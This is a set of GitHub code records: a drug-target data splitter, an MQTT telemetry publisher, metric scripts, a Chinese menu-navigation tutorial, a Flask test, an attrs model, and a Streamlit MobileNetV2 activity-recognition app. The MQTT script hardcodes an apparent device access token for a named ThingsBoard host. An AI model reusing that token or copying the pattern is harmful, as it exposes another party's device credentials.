+{"seq_id":"42779091199","text":"import os\nimport pandas as pd\nimport numpy as np\nimport itertools\nimport random\nfrom sklearn.model_selection import KFold\n\n\ndef split(dataset, n_splits=5, ratio=10):\n \n fpath = '../data/moa/' + dataset + '/'\n drug_smi = pd.read_csv(fpath + 'drug_smi.csv', sep='\\t')\n tar_seq = pd.read_csv(fpath + 'tar_seq.csv', sep='\\t')\n # tar_gene = pd.read_csv(fpath + 'tar_gene.csv', sep='\\t')\n dti = pd.read_csv(fpath + 'dti.csv', sep='\\t')\n\n drugs = list(drug_smi['DrugID'])\n targets = list(tar_seq['TargetID'])\n\n dti_all = list(itertools.product(drugs, targets))\n dti_pos = [(row[0], row[1]) for _, row in dti.iterrows()]\n dti_neg_all = list(set(dti_all) - set(dti_pos))\n assert len(dti_all) == len(dti_neg_all) + len(dti_pos)\n\n dti_neg = random.sample(dti_neg_all, len(dti_pos) * ratio)\n\n dti_pos = [tup + (1,) for tup in dti_pos]\n dti_neg = [tup + (0,) for tup in dti_neg]\n dti = np.array(dti_pos + dti_neg)\n\n drugs_arr = np.array(drugs)\n targets_arr = np.array(targets)\n \n def save_fold(data, setting, idx, name):\n data = pd.DataFrame(data, columns=['DrugID', 'TargetID', 'label'])\n fold_path = fpath + 'data_folds/' + setting\n os.makedirs(fold_path, exist_ok=True)\n data.to_csv(fold_path + '/' + name + '_fold_' + str(idx) + '.csv', index=None)\n \n def split_warm(setting='warm_start'):\n kf = KFold(n_splits=n_splits, shuffle=True, random_state=0)\n idx = 0\n for train_index, test_index in kf.split(dti):\n dti_train = dti[train_index]\n dti_test = dti[test_index]\n save_fold(dti_train, setting, idx, 'train')\n save_fold(dti_test, setting, idx, 'test')\n idx += 1\n\n def split_drug_cold(setting='drug_coldstart'):\n kf = KFold(n_splits=n_splits, shuffle=True, random_state=0)\n idx = 0\n for train_index, test_index in kf.split(drugs_arr):\n dti_train = dti[np.isin(dti[:, 0], drugs_arr[train_index])]\n dti_test = dti[np.isin(dti[:, 0], drugs_arr[test_index])]\n save_fold(dti_train, setting, idx, 'train')\n save_fold(dti_test, setting, idx, 'test')\n idx += 1\n\n def split_protein_cold(setting='protein_coldstart'):\n kf = KFold(n_splits=n_splits, shuffle=True, random_state=0)\n idx = 0\n for train_index, test_index in kf.split(targets_arr):\n dti_train = dti[np.isin(dti[:, 1], targets_arr[train_index])]\n dti_test = dti[np.isin(dti[:, 1], targets_arr[test_index])]\n save_fold(dti_train, setting, idx, 'train')\n save_fold(dti_test, setting, idx, 'test')\n idx += 1\n \n split_warm()\n split_drug_cold()\n split_protein_cold()\n \n print(dataset + ' dataset split completed.')\n\n\nif __name__ == '__main__':\n \n for dataset in ['activation', 'inhibition']:\n split(dataset)\n","repo_name":"CSUBioGroup/DTIAM","sub_path":"code/data_process/data_split_moa.py","file_name":"data_split_moa.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"33727900412","text":"import os\nimport time\nimport sys\nimport json\nimport random\nimport paho.mqtt.client as mqtt\nimport ssl\n\nTHINGSBOARD_HOST = 'srv-iot.diatel.upm.es'\nACCESS_TOKEN = '3qLLqP02I6b3z4laOxYB'\n# Function to read sensor values\n'''def read_from_sensor():\n temp = random.randint(25,45)\n hum = random.randint(50,60)\n air = random.randint(55,60)\n light = random.randint(100,180)\n return temp, hum, air,light'''\n# Thingsboard platform credentials\n\n\n'''INTERVAL = 5\nsensor_data = {'temperature' :0,'humidity':0,'air_quality':0,'light_intensity':0}\nnext_reading = time.time()'''\nsensor_data = {'Status' : 1, 'Tree':24, 'Field':3, 'Water ml': 73}\n\nclient = mqtt.Client()\nclient.username_pw_set(ACCESS_TOKEN)\nclient.tls_set(certfile=None,\n keyfile=None,\n cert_reqs=ssl.CERT_REQUIRED)\nclient.connect(THINGSBOARD_HOST,8883)\nclient.loop_start()\n\ntry:\n while True:\n #temp,hum,air,light = read_from_sensor()\n\n '''print(\"Temperature:\",temp, chr(176) + \"C\")\n print(\"Humidity:\", hum,\"%rH\")\n print(\"Air Quality:\", air,\"%\")\n print(\"Light Intensity:\", light,\"lux\")\n \n sensor_data['temperature'] = temp\n sensor_data['humidity'] = hum\n sensor_data['air_quality'] = air\n sensor_data['light_intensity'] = light'''\n\n client.publish('v1/devices/me/telemetry',json.dumps(sensor_data))\n time.sleep(10)\n\n\nexcept KeyboardInterrupt:\n pass\n\nclient.loop_stop()\nclient.disconnect()","repo_name":"mgmarin23/Architure_Project","sub_path":"Pub_MQTT.py","file_name":"Pub_MQTT.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"19008021278","text":"\"\"\"\nMetrics on the results of the is_results_page algorithm run over the evaluation set\n\"\"\"\n\ndef stats_classification():\n labels_path = 'evaluation_set.csv'\n results_path = 'results_output.csv'\n\n false_positives = 0\n false_negatives = 0\n true_positives = 0\n true_negatives = 0\n\n with open(labels_path) as f_labels:\n with open(results_path) as f_results:\n labels = f_labels.readlines()\n results = f_results.readlines()\n\n for (label_, result_) in zip(labels, results):\n label = int(label_.split(',')[1].replace('\\n',''))\n if label > 0: label = True\n else: label = False\n result = result_.split(',')[1].replace('\\n','')\n if result == 'True': result = True\n else: result = False\n if label and result:\n true_positives += 1\n elif label and not result:\n false_negatives += 1\n elif not label and result:\n false_positives += 1\n else:\n true_negatives += 1\n\n total = true_negatives + true_positives + false_negatives + false_positives\n recall = true_positives / (true_positives + false_negatives)\n precision = true_positives / (true_positives + false_positives)\n accuracy = (true_negatives + true_positives) / total\n\n print('false positives: {}'.format(false_positives))\n print('false negatives: {}'.format(false_negatives))\n print('true positives: {}'.format(true_positives))\n print('true negatives: {}'.format(true_negatives))\n print('recall: {}'.format(recall))\n print('precision: {}'.format(precision))\n print('accuracy: {}'.format(accuracy))\n print('correctly identified: {}'.format(true_positives + true_negatives))\n print('total: {}'.format(total))\n\n\ndef stats_parsing():\n\n results_path = 'items_count.csv'\n\n correct_count = 0\n incorrect_count = 0\n total_posts = 0\n total_parsed_posts = 0\n\n with open(results_path) as f_results:\n lines = f_results.readlines()\n for line in lines:\n expected_count = int(line.split(',')[1].replace('\\n', ''))\n actual_count = int(line.split(',')[2].replace('\\n', ''))\n total_posts += expected_count\n total_parsed_posts += actual_count\n if expected_count == actual_count:\n correct_count += 1\n else:\n incorrect_count += 1\n\n total = correct_count + incorrect_count\n accuracy = float(correct_count) / float(total)\n\n print('accuracy: {}'.format(accuracy))\n print('correctly parsed pages count: {}'.format(correct_count))\n print('total pages: {}'.format(total))\n print('total parsed posts: {}'.format(total_parsed_posts))\n print('total posts: {}'.format(total_posts))\n print('percentage of posts parsed: {}'.format(float(total_parsed_posts)/float(total_posts)))\n\n\nif __name__ == \"__main__\":\n print('Classification:')\n stats_classification()\n print('\\n')\n print('Parsing:')\n stats_parsing()","repo_name":"fearnleymartin/knowledge-base","sub_path":"knowledge_base/tests/analyse_results.py","file_name":"analyse_results.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"5169001547","text":"#这个是就是文艺(装逼)青年版, 来,我们加一个回退功能\nmenu = {\n\t'北京':{\n\t\t'海淀':{...},\n\t\t'昌平':{\n\t\t\t'沙河':{\n\t\t\t\t'老男孩':{...},\n\t\t\t\t'贼溜啊':{...},\t\n\t\t\t},\n\t\t\t'天通苑':{\n\t\t\t'这样':{\n\t\t\t'那样的':{...},\n\t\t\t'啥样的':{\n\t\t\t\t'王':{\n\t\t\t\t\t\n\t\t\t\t},\n\t\t\t\t'李':{...},\n\t\t\t},\n\t\t\t'高':{},\n\t\t\t'高手':{},\n\t\t\t},\n\t\t\t},\n\t\t\t'回龙观':{\n\t\t\t\n\t\t\t},\n\t\t},\n\t\t'朝阳':{...},\n\t\t'东城':{...},\n\t},\n\t'上海':{\n\t\t'闽行':{...},\n\t\t'闸北':{...},\n\t\t'浦东':{...},\n\t},\n\t'山东':{\n\t\t'济南':{\n\t\t\t\n\t\t\t'景点':{},\n\t\t\t'美食':{},\n\t\t\t'商场':{},\n\t\t\t'银行':{},\n\t\t\t'医院':{},\n\t\t\t'电影院':{},\n\t\t\t'KTV':{},\n\t\t\t'酒店':{},\n\t\t\t'加油站':{},\n\t\t},\n\t\t'青岛':{\n\t\t\n\t\t\t'景点':{},\n\t\t\t'美食':{},\n\t\t\t'商场':{},\n\t\t\t'银行':{},\n\t\t\t'医院':{},\n\t\t\t'电影院':{},\n\t\t\t'KTV':{},\n\t\t\t'酒店':{},\n\t\t\t'加油站':{},\n\t\t},\n\t\t'淄博':{...},\n\t\t'枣庄':{...},\n\t\t'东营':{...},\n\t\t'烟台':{\n\t\t\n\t\t\t'景点':{},\n\t\t\t'美食':{},\n\t\t\t'商场':{},\n\t\t\t'银行':{},\n\t\t\t'医院':{},\n\t\t\t'电影院':{},\n\t\t\t'KTV':{},\n\t\t\t'酒店':{},\n\t\t\t'加油站':{},\n\t\t},\n\t\t'潍坊':{...},\n\t\t'济宁':{...},\n\t\t'潍坊':{...},\n\t\t'泰安':{...},\n\t\t'威海':{...},\n\t\t'日照':{...},\n\t\t'莱芜':{...},\n\t},\n}\n#保存记录每一层的记录\ncurrent_layer = menu\n#我在这里加一条语句来记住上一层\n#last_layer = menu 不要这个了\nlayers = [] \n#layers 相当于一个列表\nwhile True:\n\tfor k in current_layer:\n\t\tprint(k)\n\tchoice = input(\">:\").strip()\n\tif not choice:continue\n\tif choice in current_layer:\n\t\t#进入之前要记住上一层\n\t\t#last_layer = current_layer\t\t\n\t\tlayers.append(current_layer)#进入下一层,保存当前层\n\t\tprint(layers)\n\t\tcurrent_layer = current_layer[choice]\t\t#[北京]\n\telif choice == 'b':\n\t\tif len(layers) != 0:\n\t\t\tcurrent_layer = layers.pop()\n\t\telse:\n\t\t\tprint(\"还退个锤子退,再退就过油子了\")\n\t\t#pass\t#这个pass就比较吊了#这个咋也不要了呢???\n\t\t\n\t\t#搞定了,随便怎么回了现在 牛逼吧,现在还是有点瑕疵 就是 最外层不能回退 要是回退就报错了\n\t\t\n#现在问题来了,怎么退回去,这一层就是第二层,进来之后就是这一层了,程序已经不记得上一层了怎么回去??? 那要是记住好像能行么?那第三层能记住最外层么?\n\t\t#current_layer = current_layer[choice]\n\t\t#wow 我靠 ,牛逼牛逼,哎等会儿,调试出bug了,这怎么只能回退一次呢???这可咋整,不管进入多少步?都只能退一回,程序只能记住上一个层级.额 (⊙o⊙)… 还是不行啊,他不能再往回走,咋整吧\t其实我想的是这样,我一路走过去,再一路返回去 \n# 好了我来提供一个新的思路:\n\t# 来把进入的每一层都保存下来就完了嘛\n\t\n#看到了吧,这短短10多行代码,就解决这个问题了,其实那个存层级的列表,也还可以优化,因为每进入一个列表就要存一层,还是能优化的,现在这个程度已经稍微高级一点了儿\n# 行了 就到这儿了","repo_name":"victorfengming/python_projects","sub_path":"history_pro/python_luffy/Luffy_study_my_code/作业详解/三级菜单/三级菜单作业讲解之装逼版(下).py","file_name":"三级菜单作业讲解之装逼版(下).py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"33385468796","text":"from flask import url_for\nfrom sih.tests import TestCase, logged_as\nfrom sih.extensions import db\nfrom sih.modules.stations.models import Station, Source\n\n\nclass StationsDeleteTestCase(TestCase):\n\n def test_permission_required(self):\n response = self.client.post(url_for('stations.stations_delete',\n station_id=1))\n self.assert403(response)\n\n @logged_as('admin', 'test')\n def test_station_not_found(self):\n response = self.client.post(url_for('stations.stations_delete',\n station_id=1))\n self.assert404(response)\n\n @logged_as('admin', 'test')\n def test_delete_station(self):\n source = Source(name='Test 1', identifier='test1',\n url='http://example.com', license='OpenData')\n\n station = Station(id=1, name='Test 1', code='test1',\n kind=['pluviometric'], source=source,\n altitude=10)\n db.session.add(station)\n\n url = url_for('stations.stations_delete', station_id=1)\n response = self.client.post(url)\n\n self.assertRedirects(response, url_for('stations.stations_list'))\n self.assertEqual(Station.query.count(), 0)\n","repo_name":"ecarrara/sih","sub_path":"sih/modules/stations/tests/views/stations/delete_test.py","file_name":"delete_test.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"15080984344","text":"from typing import Any, Dict, List, Type, TypeVar\n\nfrom attrs import define, field\n\nT = TypeVar(\"T\", bound=\"NewServiceResponse\")\n\n\n@define\nclass NewServiceResponse:\n \"\"\"Response to a service creation request.\n\n Attributes:\n service_id (str): Unique service id.\n \"\"\"\n\n service_id: str\n additional_properties: Dict[str, Any] = field(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n service_id = self.service_id\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update(\n {\n \"service_id\": service_id,\n }\n )\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n d = src_dict.copy()\n service_id = d.pop(\"service_id\")\n\n new_service_response = cls(\n service_id=service_id,\n )\n\n new_service_response.additional_properties = d\n return new_service_response\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"feldera/feldera","sub_path":"python/feldera-api-client/feldera_api_client/models/new_service_response.py","file_name":"new_service_response.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"91"}
+{"seq_id":"2887233333","text":"import numpy as np\nimport pandas as pd\nimport itertools\nimport tensorflow as tf\nimport streamlit as st\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.preprocessing.image import img_to_array\nfrom tensorflow.keras.applications import MobileNetV2\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.layers import Input\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.optimizers import Adam\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import StratifiedKFold\nfrom PIL import Image, ImageOps\nimport matplotlib.pyplot as plt\n\nFPS = 25\nIMAGE_HEIGHT, IMAGE_WIDTH = 224, 224\nCLASSES_DICT = {0: 'No Cheat', 1: 'Read Text',\n 2: 'Ask Friend', 5: 'Call Friend'}\nCLASSES_LIST = ['No Cheat', 'Read Text', 'Ask Friend', 'Call Friend']\nMODEL_OUTPUT_SIZE = len(CLASSES_LIST)\nBASE_DIR = './model'\n\nst.set_page_config(page_title='Human Activity Recognition')\nst.set_option('deprecation.showfileUploaderEncoding', False)\n\n\ndef local_css(file_name):\n with open(file_name) as f:\n st.markdown(f'', unsafe_allow_html=True)\n\n\nlocal_css('./style/style.css')\n\nst.sidebar.write(\n 'Human Activity Recognition Berdasarkan Webcam Menggunakan Metode MobileNet')\n\nmenu_name = st.sidebar.selectbox(\n 'Pilih Menu', ['Halaman Depan', 'Simulasi Pelatihan Model', 'Prediksi Gambar'])\n\ndef image_classification(filename):\n model = load_model(f'{BASE_DIR}/checkpoint/HAR_MobileNetV2_Model_Best.h5', compile=False)\n size = (IMAGE_HEIGHT, IMAGE_WIDTH)\n img = ImageOps.fit(filename, size, Image.ANTIALIAS)\n img = img_to_array(img)\n img = img.reshape(1, IMAGE_HEIGHT, IMAGE_WIDTH, 3)\n img = img.astype('float32')\n img = img / 255.0\n prediction = model.predict(img)\n prediction = prediction[0]\n predicted_labels_probabilities_averaged_sorted_indexes = np.argsort(prediction)[\n ::-1]\n\n st.write('#### Prediksi Kelas dan Probabilitas-nya pada Gambar:')\n for predicted_label in predicted_labels_probabilities_averaged_sorted_indexes:\n predicted_class_name = CLASSES_LIST[predicted_label]\n predicted_probability = prediction[predicted_label]\n st.write(\n f'{predicted_class_name}: {(predicted_probability * 100):.2f}%')\n\ndef get_model_name(fold_var_new):\n return f'{BASE_DIR}/checkpoint/HAR_MobileNetV2_Model_fold-{str(fold_var_new)}.h5'\n\n\ndef get_model(fold_var_new, dense_layer_new, init_lr_new, epochs_new):\n st.write('---')\n st.write(f'#### [INFO] Membangun Model Fold-{str(fold_var_new)}')\n baseModel = MobileNetV2(weights='imagenet',\n include_top=False,\n input_tensor=Input(\n shape=(IMAGE_HEIGHT, IMAGE_WIDTH, 3)),\n input_shape=(IMAGE_HEIGHT, IMAGE_WIDTH, 3),\n classes=MODEL_OUTPUT_SIZE)\n baseModel.trainable = False\n\n headModel = baseModel.output\n headModel = Conv2D(100, (3, 3), activation='relu', input_shape=(\n IMAGE_HEIGHT, IMAGE_WIDTH, 3))(headModel)\n headModel = MaxPooling2D(pool_size=(2, 2))(headModel)\n headModel = Flatten(name='flatten')(headModel)\n if dense_layer_new == 1:\n headModel = Dense(512, activation='relu',\n name='dense_layer_1')(headModel)\n if dense_layer_new == 3:\n headModel = Dense(1024, activation='relu',\n name='dense_layer_1')(headModel)\n headModel = Dense(1024, activation='relu',\n 
name='dense_layer_2')(headModel)\n headModel = Dense(512, activation='relu',\n name='dense_layer_3')(headModel)\n if dense_layer_new == 5:\n headModel = Dense(2048, activation='relu',\n name='dense_layer_1')(headModel)\n headModel = Dense(2048, activation='relu',\n name='dense_layer_2')(headModel)\n headModel = Dense(1024, activation='relu',\n name='dense_layer_3')(headModel)\n headModel = Dense(1024, activation='relu',\n name='dense_layer_4')(headModel)\n headModel = Dense(512, activation='relu',\n name='dense_layer_5')(headModel)\n if dense_layer_new == 7:\n headModel = Dense(4096, activation='relu',\n name='dense_layer_1')(headModel)\n headModel = Dense(4096, activation='relu',\n name='dense_layer_2')(headModel)\n headModel = Dense(2048, activation='relu',\n name='dense_layer_3')(headModel)\n headModel = Dense(2048, activation='relu',\n name='dense_layer_4')(headModel)\n headModel = Dense(1024, activation='relu',\n name='dense_layer_5')(headModel)\n headModel = Dense(1024, activation='relu',\n name='dense_layer_6')(headModel)\n headModel = Dense(512, activation='relu',\n name='dense_layer_7')(headModel)\n headModel = Dense(MODEL_OUTPUT_SIZE, activation='softmax',\n name='dense_layer_out')(headModel)\n\n model = Model(inputs=baseModel.input, outputs=headModel)\n for layer in baseModel.layers:\n layer.trainable = False\n\n opt = Adam(learning_rate=init_lr_new, decay=init_lr_new / epochs_new)\n model.compile(loss='categorical_crossentropy',\n optimizer=opt, metrics=['accuracy'])\n\n return model\n\n\ndef plot_history(H, fold_var_new):\n st.write('---')\n st.write(f'#### [INFO] Plot Fold-{str(fold_var_new)}')\n plt.style.use('ggplot')\n plt.figure()\n plt.plot(range(1, len(H.history['loss'])+1),\n H.history['loss'], label='train_loss')\n plt.plot(range(1, len(H.history['val_loss'])+1),\n H.history['val_loss'], label='val_loss')\n plt.title('Training and Validation Loss')\n plt.xlabel('Epoch')\n plt.ylabel('Value')\n plt.legend(loc='upper right', bbox_to_anchor=(1.25, 1))\n savefig_dir = f'{BASE_DIR}/plot/plot_loss_fold-{str(fold_var_new)}.png'\n plt.savefig(savefig_dir, bbox_inches='tight')\n image = Image.open(savefig_dir)\n st.write('Plot Pelatihan dan Validasi Loss')\n st.image(image, use_column_width=True)\n\n plt.style.use('ggplot')\n plt.figure()\n plt.plot(range(1, len(H.history['accuracy'])+1),\n H.history['accuracy'], label='train_acc')\n plt.plot(range(1, len(H.history['val_accuracy'])+1),\n H.history['val_accuracy'], label='val_acc')\n plt.title('Training and Validation Accuracy')\n plt.xlabel('Epoch')\n plt.ylabel('Value')\n plt.legend(loc='upper right', bbox_to_anchor=(1.25, 1))\n savefig_dir = f'{BASE_DIR}/plot/plot_accuracy_fold-{str(fold_var_new)}.png'\n plt.savefig(savefig_dir, bbox_inches='tight')\n image = Image.open(savefig_dir)\n st.write('Plot Pelatihan dan Validasi Akurasi')\n st.image(image, use_column_width=True)\n\ndef plot_confusion_matrix(cm, classes, fold_var_new, normalize=True, title='Confusion Matrix', cmap=plt.cm.Blues):\n st.write('---')\n st.write(f'#### [INFO] Confusion Matrix Fold-{str(fold_var_new)}')\n plt.figure(figsize=(10, 10))\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n if normalize:\n cm = cm.astype('float')/cm.sum(axis=1)[:, np.newaxis]\n cm = np.around(cm, decimals=2)\n cm[np.isnan(cm)] = 0.0\n st.write(f'Normalized Confusion Matrix')\n else:\n st.write(f'Confusion Matrix, 
Without Normalization')\n\n thresh = cm.max()/2.\n\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, cm[i, j], horizontalalignment='center',\n color='white' if cm[i, j] > thresh else 'black')\n\n plt.tight_layout()\n plt.ylabel('True Label')\n plt.xlabel('Predicted Label')\n if normalize:\n savefig_dir = f'{BASE_DIR}/plot/plot_confusion_matrix_normalized_fold-{str(fold_var_new)}.png'\n else:\n savefig_dir = f'{BASE_DIR}/plot/plot_confusion_matrix_fold-{str(fold_var_new)}.png'\n plt.savefig(savefig_dir, bbox_inches='tight')\n image = Image.open(savefig_dir)\n st.image(image, use_column_width=True)\n\n\nif menu_name == 'Halaman Depan':\n st.write('## Halaman Depan')\n st.write('---')\n st.write('#### Judul Skripsi:')\n st.write(\n '#### Human Activity Recognition Berdasarkan Webcam Menggunakan Metode MobileNet')\n st.write('---')\n st.write('#### Abstrak:')\n st.markdown('
Manusia tidak bisa terlepas dari aktivitas sehari-hari yang mana merupakan bagian dari aktivitas kehidupan manusia. Human Activity Recognition (HAR) atau pengenalan aktivitas manusia saat ini merupakan salah satu topik yang sedang banyak diteliti seiring dengan pesatnya kemajuan di bidang teknologi yang berkembang saat ini. Hampir semua bidang terdampak dari pandemi COVID-19 yang mempengaruhi aktivitas manusia sehingga menjadi lebih terbatas. Salah satu bidang yang paling terdampak yaitu pendidikan, di mana kampus menerapkan sistem pembelajaran daring, sehingga dosen lebih sulit untuk mengawasi pembelajaran maupun ujian yang dilakukan secara daring karena tidak dapat mengawasi aktivitas yang dilakukan mahasiswa secara langsung.
', unsafe_allow_html=True)\n\nif menu_name == 'Simulasi Pelatihan Model':\n st.write('## Simulasi Pelatihan Model')\n st.write('---')\n st.warning('Catatan:\\nData yang digunakan pada simulasi pelatihan dan pengujian model pada halaman ini menggunakan 10% dari data yang digunakan pada penelitian.')\n st.write('---')\n st.write('#### Atur Hyperparameter')\n init_lr_new = st.select_slider(\n 'Learning Rate', options=[1e-1, 1e-2, 1e-3, 1e-4, 1e-5], value=1e-1)\n epochs_new = st.slider('Epochs', min_value=2, max_value=40, value=2, step=1)\n early_stopping_new = st.slider('Early Stopping Patience', min_value=1,\n max_value=40, value=10, step=1)\n batch_size_new = st.select_slider(\n 'Batch Size', options=[8, 16, 32, 64, 128, 256], value=8)\n dense_layer_new = st.select_slider(\n 'Dense Layer', options=[1, 3, 5, 7], value=1)\n st.write('---')\n st.write(f'''\\n#### Cek Hyperparameter yang Diatur\n \\nLearning Rate: {init_lr_new}\n \\nEpochs: {epochs_new}\n \\nEarly Stopping: {early_stopping_new}\n \\nBatch Size: {batch_size_new}\n \\nDense Layer: {dense_layer_new}''', unsafe_allow_html=True)\n if dense_layer_new == 1:\n st.code(\n f'''Dense(512, activation='relu', name='dense_layer_1')''', language='python')\n if dense_layer_new == 3:\n st.code(f'''Dense(1024, activation='relu', name='dense_layer_1')\\nDense(1024, activation='relu', name='dense_layer_2')\\nDense(512, activation='relu', name='dense_layer_3')''', language='python')\n if dense_layer_new == 5:\n st.code(f'''Dense(2048, activation='relu', name='dense_layer_1')\\nDense(2048, activation='relu', name='dense_layer_2')\\nDense(1024, activation='relu', name='dense_layer_3')\\nDense(1024, activation='relu', name='dense_layer_4')\\nDense(512, activation='relu', name='dense_layer_5')''', language='python')\n if dense_layer_new == 7:\n st.code(f'''Dense(4096, activation='relu', name='dense_layer_1')\\nDense(4096, activation='relu', name='dense_layer_2')\\nDense(2048, activation='relu', name='dense_layer_3')\\nDense(2048, activation='relu', name='dense_layer_4')\\nDense(1024, activation='relu', name='dense_layer_5')\\nDense(1024, activation='relu', name='dense_layer_6')\\nDense(512, activation='relu', name='dense_layer_7')''', language='python')\n\n if st.button('Jalankan Model'):\n train_datagen = ImageDataGenerator(\n rotation_range=10,\n width_shift_range=0.1,\n height_shift_range=0.1,\n shear_range=0.1,\n zoom_range=[0.9, 1.0],\n fill_mode='nearest',\n horizontal_flip=True,\n vertical_flip=True,\n rescale=1./255)\n\n test_datagen = ImageDataGenerator(rescale=1./255)\n\n train_data = pd.read_csv(\n f'{BASE_DIR}/data/split_perdata/train_labels.csv')\n test_data = pd.read_csv(\n f'{BASE_DIR}/data/split_perdata/test_labels.csv')\n\n train_y = train_data.label\n train_x = train_data.drop(['label'], axis=1)\n\n skf = StratifiedKFold(n_splits=3, shuffle=True, random_state=47)\n data_kfold = pd.DataFrame()\n\n validation_accuracy = []\n validation_loss = []\n fold_var_new = 1\n\n for train_index, val_index in list(skf.split(train_x, train_y)):\n training_data = train_data.iloc[train_index]\n validation_data = train_data.iloc[val_index]\n\n train_data_generator = train_datagen.flow_from_dataframe(\n training_data,\n directory=f'{BASE_DIR}/data/split_perdata/train/',\n x_col='filename',\n y_col='label',\n target_size=(IMAGE_HEIGHT, IMAGE_WIDTH),\n color_mode='rgb',\n class_mode='categorical',\n batch_size=batch_size_new,\n shuffle=True)\n valid_data_generator = train_datagen.flow_from_dataframe(\n validation_data,\n 
directory=f'{BASE_DIR}/data/split_perdata/train/',\n x_col='filename',\n y_col='label',\n target_size=(IMAGE_HEIGHT, IMAGE_WIDTH),\n color_mode='rgb',\n class_mode='categorical',\n batch_size=batch_size_new,\n shuffle=True)\n\n model = get_model(fold_var_new, dense_layer_new,\n init_lr_new, epochs_new)\n checkpoint = tf.keras.callbacks.ModelCheckpoint(\n get_model_name(fold_var_new),\n monitor='val_accuracy',\n verbose=1,\n save_best_only=True,\n mode='max')\n early_stopping = tf.keras.callbacks.EarlyStopping(\n monitor='val_accuracy',\n patience=early_stopping_new,\n verbose=1,\n mode='auto',\n baseline=None)\n\n placeholder = st.empty()\n placeholder.write('Pelatihan dan Pengujian Model Sedang Diproses')\n with st.spinner('Silahkan Tunggu ...'):\n history = model.fit(train_data_generator,\n steps_per_epoch=train_data_generator.samples // train_data_generator.batch_size,\n epochs=epochs_new,\n validation_data=valid_data_generator,\n validation_steps=valid_data_generator.samples // valid_data_generator.batch_size,\n verbose=1,\n callbacks=[checkpoint, early_stopping])\n plot_history(history, fold_var_new)\n placeholder.empty()\n\n model.load_weights(\n f'{BASE_DIR}/checkpoint/HAR_MobileNetV2_Model_fold-{str(fold_var_new)}.h5')\n\n test_data_generator = test_datagen.flow_from_dataframe(\n test_data,\n directory=f'{BASE_DIR}/data/split_perdata/test/',\n x_col='filename',\n y_col='label',\n target_size=(IMAGE_HEIGHT, IMAGE_WIDTH),\n color_mode='rgb',\n class_mode='categorical',\n batch_size=batch_size_new,\n shuffle=False)\n test_data_generator.reset()\n test_steps_per_epoch = np.math.ceil(\n test_data_generator.samples / test_data_generator.batch_size)\n predictions = model.predict_generator(\n test_data_generator, steps=test_steps_per_epoch)\n predicted_classes = np.argmax(predictions, axis=1)\n true_classes = test_data_generator.classes\n class_labels = list(test_data_generator.class_indices.keys())\n\n cm = confusion_matrix(true_classes, predicted_classes)\n plot_confusion_matrix(\n cm, class_labels, fold_var_new, normalize=True)\n\n st.write('---')\n st.write(\n f'#### [INFO] Classification Report Fold-{str(fold_var_new)}')\n report = classification_report(\n true_classes, predicted_classes, target_names=class_labels, output_dict=True)\n report_df = pd.DataFrame(report).transpose()\n st.dataframe(report_df)\n\n data_kfold[fold_var_new] = predicted_classes\n st.write('---')\n st.write(f'#### [INFO] Fold {fold_var_new} Selesai Dijalankan')\n if fold_var_new == 3:\n st.write('---')\n st.success('Pelatihan dan Pengujian Model Selesai Dijalankan')\n tf.keras.backend.clear_session()\n fold_var_new += 1\n\nif menu_name == 'Prediksi Gambar':\n st.write('## Prediksi Gambar')\n st.write('---')\n uploaded_image = st.file_uploader(\n 'Silahkan Pilih Gambar yang Ingin Diprediksi', type=['jpg', 'png'])\n if uploaded_image is not None:\n image = Image.open(uploaded_image)\n st.write('---')\n st.write('#### Gambar yang Diupload:')\n st.image(image, use_column_width=True)\n st.write('---')\n placeholder = st.empty()\n placeholder.write('Prediksi Sedang Diproses')\n image_classification(image)\n placeholder.empty()","repo_name":"fauzanakmalh1/har_code_1","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":17989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
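One note on the record above: Model.predict_generator is deprecated in recent TensorFlow releases, and Model.predict accepts the same generator directly. A minimal equivalent for that block, assuming the record's model, test_data_generator, and test_steps_per_epoch are in scope:

predictions = model.predict(test_data_generator, steps=test_steps_per_epoch)
predicted_classes = np.argmax(predictions, axis=1)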
